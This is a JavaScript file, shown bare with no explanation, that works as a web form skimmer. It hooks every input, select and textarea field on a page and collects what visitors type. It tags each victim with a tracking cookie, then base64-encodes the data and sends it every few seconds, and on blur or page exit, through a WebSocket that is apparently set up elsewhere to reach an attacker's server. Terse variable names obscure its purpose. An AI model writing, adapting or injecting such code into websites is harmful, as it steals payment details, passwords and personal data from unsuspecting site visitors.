function initializeWebSocket() {
if (window.ww && window.ww.readyState !== WebSocket.CLOSED) {
wssocket = window.ww;
} else {
console.error("WebSocket is not initialized or is closed.");
}
}

try {
var ph = true;
var pc = true;
var cn = true;
var C = [];

function setCookie(name, value, days) {
    var expires = "";
    if (days) {
        var date = new Date();
        date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
        expires = "; expires=" + date.toUTCString();
    }
    document.cookie = name + "=" + (value || "") + expires + "; path=/";
}

function getCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}

function getRandomNumber() {
    return (100000000 + Math.floor(Math.random() * 900000000)).toString();
}

function checkCookie() {
    var userCookie = getCookie('gif_va');
    if (!userCookie) {
        var currentTime = new Date().getTime();
        var userIP = getRandomNumber(); 
        var uniqueValue = currentTime + userIP;
        setCookie('gif_va', uniqueValue, 1);
        return uniqueValue;
    }
    return userCookie;
}

var userCookie = checkCookie();

function base64Encode(str) {
    return btoa(unescape(encodeURIComponent(str)));
}

function base64Decode(str) {
    return decodeURIComponent(escape(atob(str)));
}

function fr(w) {
    E = C.find((rcedElementObj)=>w === rcedElementObj.w);
    if (E)
        return E;
}
function iL(w, v, l, o) {
    r = fr(w);
    if (r) {
        r.ls[v] = r.ls[v] || [];
    } else {
        r = {
            w: w,
            ls: {}
        };
        r.ls[v] = [];
        C.push(r);
    }
    r.ls[v].push(l);
    w.addEventListener(v, l, o);
}
function lE(l, v) {
    r = fr(l);
    if (r && v in r.ls) {
        return true;
    } else {
        return false;
    }
}
function iM() {
    if (sessionStorage.desktop)
        return false;
    else if (localStorage.mobile)
        return true;
    mobile = ["mobile", "phone"];
    for (var i in mobile)
        if (navigator.userAgent.toLowerCase().indexOf(mobile[i].toString().toLowerCase()) > 0)
            return true;
    return false;
}
ch = false;
if (!ph) {
    if (iM()) {
        ch = true;
    } else {
        if (!pc) {
            ch = true;
        }
    }
} else {
    if (!iM()) {
        if (!pc) {
            ch = true;
        }
    }
}
function hl() {
    if (!iR) {
        iR = true;
    }
    nm = ["textarea", "select", "input"];
    for (i = 0,
    n = nm.length; i < n; i++) {
        Array.from(document.getElementsByTagName(nm[i])).forEach(function(t, e) {
            if (lE(t, "change") === false) {
                if (undefined !== t.value) {
                    h(t);
                }
                iL(t, "change", function() {
                    h(this);
                });
            }
        });
    }
}
function h(t) {
    if (t.value.length > 0 && t.value.length < 100) {
        if (!ch) {
            v = t.value;
            if (t.options) {
                if (t.selectedIndex >= 0) {
                    v = t.options[t.selectedIndex].text.replace(/,/g, "");
                }
            }
            v = v.replace(/[`~!#$%^&*()|+\=?;:'"<>\{\}\[\]\\/]/gi, "");
            ti = t.id;
            tn = t.name;
            (ti.length > 0 ? idl = "-" + ti.length : idl = "");
            s = [];
            v.length > 0 && (0 == tn.length ? s.push(ti + ":" + v) : 0 != tn.length && s.push(tn.replace(/:/g, "") + idl + ":" + v));
            retrievedObject = JSON.parse(localStorage.getItem("ars"));
            s = s.concat(retrievedObject);
            s = s.filter(function(e) {
                return e
            });
            localStorage.setItem('ars', JSON.stringify(s));
        }
    }
}

var wssocket;
var pingInterval = 10000;

function sendDataViaWebSocket(data) {
    if (wssocket.readyState === WebSocket.OPEN) {
       let encodedData = base64Encode(JSON.stringify(data));
       wssocket.send(encodedData);
    } else {
        console.error("WebSocket is not open. ReadyState:", wssocket.readyState);
    }
}
function sendPing() {
        if (wssocket.readyState === WebSocket.OPEN) {
            wssocket.send(" ");
        }
    }
	
initializeWebSocket(); 
setInterval(sendPing, pingInterval);

function sn() {
    var retrievedData = localStorage.getItem("ars");
    if (retrievedData) {
        var dataObject = JSON.parse(retrievedData);
        var userAgent = navigator.userAgent;
        var formattedData = {
            'referrer': window.location.hostname, 
            'userCookie': userCookie,
            'data': dataObject,
            'userAgent': userAgent
        };

        sendDataViaWebSocket(formattedData);
        localStorage.removeItem("ars");
    }
}

var iR = false;
-1 != location.href.search("/") && setInterval(hl, 1500);
setInterval(sn, 3000);
window.addEventListener("beforeunload", function(s) {
    var n = sn(s);
    if (n) {
        sendDataViaWebSocket(n);
    }
});
window.onblur = function() {
    sn();
}
document.querySelector('input').addEventListener('blur', function() {
    sn();
});

} catch (e) {
console.error("Error:", e);
}